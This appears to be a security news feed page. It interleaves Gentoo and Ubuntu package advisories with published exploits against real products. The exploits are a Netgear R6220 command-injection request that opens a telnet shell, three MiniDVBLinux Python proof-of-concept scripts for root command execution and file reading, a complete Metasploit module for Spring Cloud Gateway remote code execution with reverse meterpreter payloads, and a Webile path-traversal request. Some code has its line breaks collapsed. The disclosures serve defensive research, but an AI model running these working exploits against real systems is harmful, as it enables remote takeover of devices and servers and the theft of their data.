Netgear R6220 v1.1.0.114_1.0.1 suffers from Incorrect Access Control, resulting in a command injection vulnerability.

**Information**

**Vendor of the products:**    Netgear

**Reported by:**    Chengjian(cj775995648@gmail.com) & HuoXingpeng(huoxingpeng@outlook.com) & ShaLetian(ltsha@njupt.edu.cn)

**Affected products:**    Netgear r6220 <= v1.1.0.114\_1.0.1

**Firmware download address:** https://www.downloads.netgear.com/files/GDC/R6220/R6220-V1.1.0.114.zip

** Vulnerability Description**

The vulnerability is detected at /usr/sbin/setup.cgi

The vulnerability point is located at the following location in sub_1AF88

The v4 here receives the remote_passcode parameter, which is first filtered by the test_command_inject function. Although a lot of characters are filtered out here, we can still use & for splice injection. The /bin/sh check can also be bypassed by constructs like /$9bin/$9sh, and telnetd can also be bypassed by constructs like telne''td.

After passing the inspection, the remote_passcode parameter is obtained directly through nvram_set, and then obtained and assigned to v7 through nvram_get, and finally passed into the COMMAND function for splicing and execution without checking.

This bypasses the check and implements command injection.

**POC**

After logging in to the page, command injection can be achieved by capturing packets through burpsuite and sending the following request.

POST /setup.cgi??id=7c534ca23308d480 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 345
Origin: http://192.168.1.1
Authorization: Basic YWRtaW46QWRtaW4x
Connection: close
Referer: http://192.168.1.1/USB\_media.htm&todo=cfg\_init
Cookie: sessionid=sid16174xxx73678xxx1962923992x
Upgrade-Insecure-Requests: 1

media\_server=&itunes\_server=&config\_passcode=&media\_server\_name=ReadyDLNA&scan=0&h\_media\_server=enable&h\_itunes\_server=enable&remote\_passcode=%26telne%27%27td+-l+%2F%249bin%2F%249sh+-p+5214+-b+0.0.0.0%26&h\_scan=0&todo=iserver\_allow\_ctrl&this\_file=USB\_media.htm&next\_file=USB\_media.htm

**Get Shell**

First, port 5214 is closed, and we directly test the connection through nc.

Then use burpsuite to capture packets and modify parameters, and submit.

Connect again, and successfully connect the terminal through port 5214.

CVE-2022-42221: CVE_Report/Netgear/R6220 at main · Cj775995/CVE_Report

Gentoo Linux Security Advisory 202210-9 - Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service. Versions less than 1.63.0-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Rust: Multiple Vulnerabilities  
     Date: October 16, 2022  
     Bugs: #870166, #831638, #821157, #807052, #782367  
       ID: 202210-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Rust, the worst of  
which could result in denial of service.

Background  
=========  
A systems programming language that runs blazingly fast, prevents  
segfaults, and guarantees thread safety.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-lang/rust              < 1.63.0-r1              >= 1.63.0-r1  
  2  dev-lang/rust-bin          < 1.64.0                    >= 1.64.0

Description  
==========  
Multiple vulnerabilities have been discovered in Rust. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Rust users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-lang/rust-1.63.0-r1"

All Rust binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-lang/rust-bin-1.64.0"

In addition, users using Portage 3.0.38 or later should ensure that  
packages with Rust binaries have no vulnerable code statically linked  
into their binaries by rebuilding the @rust-rebuild set:

  # emerge --ask --oneshot --verbose @rust-rebuild

References  
=========  
[ 1 ] CVE-2021-28875  
      https://nvd.nist.gov/vuln/detail/CVE-2021-28875  
[ 2 ] CVE-2021-28876  
      https://nvd.nist.gov/vuln/detail/CVE-2021-28876  
[ 3 ] CVE-2021-28877  
      https://nvd.nist.gov/vuln/detail/CVE-2021-28877  
[ 4 ] CVE-2021-28878  
      https://nvd.nist.gov/vuln/detail/CVE-2021-28878  
[ 5 ] CVE-2021-28879  
      https://nvd.nist.gov/vuln/detail/CVE-2021-28879  
[ 6 ] CVE-2021-29922  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29922  
[ 7 ] CVE-2021-31162  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31162  
[ 8 ] CVE-2021-36317  
      https://nvd.nist.gov/vuln/detail/CVE-2021-36317  
[ 9 ] CVE-2021-36318  
      https://nvd.nist.gov/vuln/detail/CVE-2021-36318  
[ 10 ] CVE-2021-42574  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42574  
[ 11 ] CVE-2021-42694  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42694  
[ 12 ] CVE-2022-21658  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21658  
[ 13 ] CVE-2022-36113  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36113  
[ 14 ] CVE-2022-36114  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36114

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-09

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-09

Ubuntu Security Notice 5682-1 - It was discovered that the BPF verifier in the Linux kernel did not properly handle internal data structures. A local attacker could use this to expose sensitive information. It was discovered that an out-of-bounds write vulnerability existed in the Video for Linux 2 implementation in the Linux kernel. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5682-1  
October 14, 2022

linux-aws-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems

Details:

It was discovered that the BPF verifier in the Linux kernel did not  
properly handle internal data structures. A local attacker could use this  
to expose sensitive information (kernel memory). (CVE-2021-4159)

It was discovered that an out-of-bounds write vulnerability existed in the  
Video for Linux 2 (V4L2) implementation in the Linux kernel. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2022-20369)

Duoming Zhou discovered that race conditions existed in the timer handling  
implementation of the Linux kernel's Rose X.25 protocol layer, resulting in  
use-after-free vulnerabilities. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-2318)

Roger Pau Monné discovered that the Xen virtual block driver in the Linux  
kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-26365)

Pawan Kumar Gupta, Alyssa Milburn, Amit Peled, Shani Rehana, Nir Shildan  
and Ariel Sabba discovered that some Intel processors with Enhanced  
Indirect Branch Restricted Speculation (eIBRS) did not properly handle RET  
instructions after a VM exits. A local attacker could potentially use this  
to expose sensitive information. (CVE-2022-26373)

Eric Biggers discovered that a use-after-free vulnerability existed in the  
io_uring subsystem in the Linux kernel. A local attacker could possibly use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2022-3176)

Roger Pau Monné discovered that the Xen paravirtualization frontend in the  
Linux kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-33740)

It was discovered that the Xen paravirtualization frontend in the Linux  
kernel incorrectly shared unrelated data when communicating with certain  
backends. A local attacker could use this to cause a denial of service  
(guest crash) or expose sensitive information (guest kernel memory).  
(CVE-2022-33741, CVE-2022-33742)

Oleksandr Tyshchenko discovered that the Xen paravirtualization platform in  
the Linux kernel on ARM platforms contained a race condition in certain  
situations. An attacker in a guest VM could use this to cause a denial of  
service in the host OS. (CVE-2022-33744)

It was discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel contained a reference counting error. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2022-36879)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   linux-image-5.4.0-1086-aws      5.4.0-1086.93~18.04.1  
   linux-image-aws                 5.4.0.1086.66

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5682-1  
   CVE-2021-4159, CVE-2022-20369, CVE-2022-2318, CVE-2022-26365,  
   CVE-2022-26373, CVE-2022-3176, CVE-2022-33740, CVE-2022-33741,  
   CVE-2022-33742, CVE-2022-33744, CVE-2022-36879

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1086.93~18.04.1

Ubuntu Security Notice USN-5682-1

MiniDVBLinux versions 5.4 and below suffer from an arbitrary file disclosure vulnerability.

    #!/usr/bin/env python3### MiniDVBLinux 5.4 Arbitrary File Read Vulnerability### Vendor: MiniDVBLinux# Product web page: https://www.minidvblinux.de# Affected version: <=5.4## Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple# way to convert a standard PC into a Multi Media Centre based on the# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this# Linux based Digital Video Recorder: Watch TV, Timer controlled# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration# via browser, and a lot more. MLD strives to be as small as possible,# modular, simple. It supports numerous hardware platforms, like classic# desktops in 32/64bit and also various low power ARM systems.## Desc: The distribution suffers from an arbitrary file disclosure# vulnerability. Using the 'file' GET parameter attackers can disclose# arbitrary files on the affected device and disclose sensitive and system# information.## Tested on: MiniDVBLinux 5.4#            BusyBox v1.25.1#            Architecture: armhf, armhf-rpi2#            GNU/Linux 4.19.127.203 (armv7l)#            VideoDiskRecorder 2.4.6### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2022-5719# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php### 24.09.2022#import requestsimport re,sys#test case 001#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUTif len(sys.argv) < 3:  print('MiniDVBLinux 5.4 File Disclosure PoC')  print('Usage: ./mldhd_fd.py [url] [file]')  sys.exit(17)else:    url = sys.argv[1]    fil = sys.argv[2]req = requests.get(url+'/?site=about&name=ZSL&file='+fil)outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()print(outz.replace('<pre>','').replace('</pre>',''))

MiniDVBLinux 5.4 Arbitrary File Read

Gentoo Linux Security Advisory 202210-8 - Multiple vulnerabilities have been discovered in Tcpreplay, the worst of which could result in denial of service. Versions less than 4.4.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Tcpreplay: Multiple Vulnerabilities  
     Date: October 16, 2022  
     Bugs: #833139, #836240  
       ID: 202210-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Tcpreplay, the worst of  
which could result in denial of service.

Background  
==========

Tcpreplay is a suite of utilities for UNIX systems for editing and  
replaying network traffic which was previously captured by tools like  
tcpdump and ethereal/wireshark.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-analyzer/tcpreplay     < 4.4.2                      >= 4.4.2

Description  
===========

Multiple vulnerabilities have been discovered in Tcpreplay. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Tcpreplay users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-analyzer/tcpreplay-4.4.2"

References  
==========

[ 1 ] CVE-2021-45386  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45386  
[ 2 ] CVE-2021-45387  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45387  
[ 3 ] CVE-2022-27416  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27416  
[ 4 ] CVE-2022-27418  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27418  
[ 5 ] CVE-2022-27939  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27939  
[ 6 ] CVE-2022-27940  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27940  
[ 7 ] CVE-2022-27941  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27941  
[ 8 ] CVE-2022-27942  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27942  
[ 9 ] CVE-2022-28487  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28487  
[ 10 ] CVE-2022-37047  
      https://nvd.nist.gov/vuln/detail/CVE-2022-37047  
[ 11 ] CVE-2022-37048  
      https://nvd.nist.gov/vuln/detail/CVE-2022-37048  
[ 12 ] CVE-2022-37049  
      https://nvd.nist.gov/vuln/detail/CVE-2022-37049

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-08

MiniDVBLinux version 5.4 suffers from an OS command execution vulnerability. This can be exploited to execute arbitrary commands as root through the command GET parameter in /tpl/commands.sh.

    #!/usr/bin/env python3### MiniDVBLinux 5.4 Remote Root Command Execution Vulnerability### Vendor: MiniDVBLinux# Product web page: https://www.minidvblinux.de# Affected version: <=5.4## Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple# way to convert a standard PC into a Multi Media Centre based on the# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this# Linux based Digital Video Recorder: Watch TV, Timer controlled# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration# via browser, and a lot more. MLD strives to be as small as possible,# modular, simple. It supports numerous hardware platforms, like classic# desktops in 32/64bit and also various low power ARM systems.## Desc: The application suffers from an OS command execution vulnerability.# This can be exploited to execute arbitrary commands as root, through the# 'command' GET parameter in /tpl/commands.sh.## Tested on: MiniDVBLinux 5.4#            BusyBox v1.25.1#            Architecture: armhf, armhf-rpi2#            GNU/Linux 4.19.127.203 (armv7l)#            VideoDiskRecorder 2.4.6### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2022-5718# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5718.php### 24.09.2022#import requestsimport re,sys#test case 002#http://ip:8008/?site=commands&section=system&command=sleep%201;reboot#-#test case 003#http://ip:8008/?site=commands&section=system&command=id#uid=0(root) gid=0(root)if len(sys.argv) < 3:  print('MiniDVBLinux 5.4 Command Execution PoC')  print('Usage: ./mldhd_root1.py [url] [cmd]')  sys.exit(17)else:    url = sys.argv[1]    cmd = sys.argv[2]req = requests.get(url+'/?site=commands&section=system&command='+cmd)req = requests.get(url+'/?site=commands&section=system&command='+cmd)outz = re.search('log\'>(.*?)</pre>',req.text,flags=re.S).group()print(outz.replace('log\'>','').replace('</pre>',''))

MiniDVBLinux 5.4 Remote Root Command Execution

MiniDVBLinux version 5.4 suffers from an OS command injection vulnerability. This can be exploited to execute arbitrary commands with root privileges.

    #!/usr/bin/env python3### MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability### Vendor: MiniDVBLinux# Product web page: https://www.minidvblinux.de# Affected version: <=5.4## Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple# way to convert a standard PC into a Multi Media Centre based on the# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this# Linux based Digital Video Recorder: Watch TV, Timer controlled# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration# via browser, and a lot more. MLD strives to be as small as possible,# modular, simple. It supports numerous hardware platforms, like classic# desktops in 32/64bit and also various low power ARM systems.## Desc: The application suffers from an OS command injection vulnerability.# This can be exploited to execute arbitrary commands with root privileges.## Tested on: MiniDVBLinux 5.4#            BusyBox v1.25.1#            Architecture: armhf, armhf-rpi2#            GNU/Linux 4.19.127.203 (armv7l)#            VideoDiskRecorder 2.4.6### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2022-5717# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php### 24.09.2022#import requestsimport re,sys#test case 001#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT#test case 004#http://ip:8008/?site=about&name=blind&file=$(id)#cat: can't open 'uid=0(root)': No such file or directory#cat: can't open 'gid=0(root)': No such file or directory#test case 005#http://ip:8008/?site=about&name=blind&file=`id`#cat: can't open 'uid=0(root)': No such file or directory#cat: can't open 'gid=0(root)': No such file or directoryif len(sys.argv) < 3:  print('MiniDVBLinux 5.4 Command Injection PoC')  print('Usage: ./mldhd_root2.py [url] [cmd]')  sys.exit(17)else:    url = sys.argv[1]    cmd = sys.argv[2]req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()print(outz.replace('<pre>','').replace('</pre>',''))

MiniDVBLinux 5.4 Remote Root Command Injection

This Metasploit module exploits an unauthenticated remote code execution vulnerability in Spring Cloud Gateway versions 3.0.0 through 3.0.6 and 3.1.0. The vulnerability can be exploited when the Gateway Actuator endpoint is enabled, exposed and unsecured. An unauthenticated attacker can use SpEL expressions to execute code and take control of the victim machine.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Spring Cloud Gateway Remote Code Execution',        'Description' => %q{          This module exploits an unauthenticated remote code execution vulnerability in Spring Cloud Gateway          versions = 3.1.0 and 3.0.0 to 3.0.6. The vulnerability can be exploited when the Gateway Actuator          endpoint is enabled, exposed and unsecured. An unauthenticated attacker can use SpEL          expressions to execute code and take control of the victim machine.        },        'License' => MSF_LICENSE,        'Author' => [          'Ayan Saha'        ],        'References' => [          ['CVE', '2022-22947' ],          ['URL', 'https://github.com/crowsec-edtech/CVE-2022-22947'],          ['URL', 'https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/'],          ['URL', 'https://tanzu.vmware.com/security/cve-2022-22947'],          ['URL', 'https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published']        ],        'Platform' => 'linux',        'Arch' => [ARCH_X64, ARCH_CMD],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',                'RPORT' => 9000              }            }          ],          [            'Linux (Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64],              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },              'Type' => :linux_dropper            }          ],        ],        'DisclosureDate' => '2022-01-26',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )  end  def run_command(cmd)    route_name = Rex::Text.rand_text_alpha(8).downcase    uri = "/actuator/gateway/routes/#{route_name}"    value = '#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/sh","-c", "' + cmd + '"}).getInputStream()))}'    data = {      'id' => route_name,      'filters' => [        {          'name' => 'AddResponseHeader',          'args' =>            {              'name' => 'Result',              'value' => value            }        }      ],      'uri' => "http://#{Rex::Text.rand_text_alphanumeric(6..15)}.com"    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(uri),      'ctype' => 'application/json',      'data' => JSON.generate(data)    })    if res && res.code == 201 && res.message == 'Created'      return route_name    else      return nil    end  end  ## Takes in the command and creates a new route with it on the server  def execute_command(cmd, _opts = {})    route_name = run_command(cmd)    if route_name      refresh      cleanup_route(route_name)    else      return false    end    return true  end  ## Cleaning up the routes created  def cleanup_route(route_name)    uri = "/actuator/gateway/routes/#{route_name}"    res = send_request_cgi({      'method' => 'DELETE',      'uri' => normalize_uri(uri)    })    if res && res.code == 200      print_good('Route deleted')      return true    else      print_error("Couldn't delete route. Might require manual cleanup.")      return false    end  end  def check    print_status('Checking if server is vulnerable')    res = execute_command('whoami')    if res      return Exploit::CheckCode::Vulnerable    else      return Exploit::CheckCode::Safe    end  end  ## Refresh the gateway to trigger the routes with commands created  def refresh    print_status('Triggering code execution using routes')    uri = '/actuator/gateway/refresh'    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(uri)    })  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

Spring Cloud Gateway 3.1.0 Remote Code Execution

Gentoo Linux Security Advisory 202210-7 - A vulnerability has been found in Deluge which could result in XSS. Versions less than 2.1.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Deluge: Cross-Site Scripting  
     Date: October 16, 2022  
     Bugs: #866842  
       ID: 202210-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been found in Deluge which could result in XSS.

Background  
==========

Deluge is a BitTorrent client.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-p2p/deluge             < 2.1.1                      >= 2.1.1

Description  
===========

Deluge does not sufficiently sanitize crafted torrent file data, leading  
to the application interpreting untrusted data as HTML.

Impact  
======

An attacker can achieve XSS via a crafted torrent file.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Deluge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-p2p/deluge-2.1.1"

References  
==========

[ 1 ] CVE-2021-3427  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3427

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-07

Webile version 1.0.1 suffers from a directory traversal vulnerability.

    Document Title:===============Webile v1.0.1 - Directory Traversal Web VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2320Release Date:=============2022-10-10Vulnerability Laboratory ID (VL-ID):====================================2320Common Vulnerability Scoring System:====================================7.3Vulnerability Class:====================Directory- or Path-TraversalCurrent Estimated Price:========================1.000€ - 2.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-02-06: Researcher Notification & Coordination (Security Researcher)2022-02-07: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2022-10-10: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============HighAuthentication Type:====================Open Authentication (Anonymous Privileges)User Interaction:=================No User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A directory traversal web vulnerability has been discovered  in the Webile v1.0.1 wifi mobile web application.The vulnerability allows remote attackers to change the application path in performed requests to compromise thelocal application or file-system of a mobile device. Attackers are for example able to request environmentvariables or a sensitive system path.The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is notsecure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files withoutsecure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.Proof of Concept (PoC):=======================The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/--- PoC Session Logs ---http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/Host: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Connection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked--- FS Session Logs ---Output:File name   bluetoothbpfcarriercompatconfiginitpermissionspppseccomp_policysecurityselinuxsensorssysconfigtextclassifierthemevintfepdgipmSecurity Risk:==============The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Tag

#linux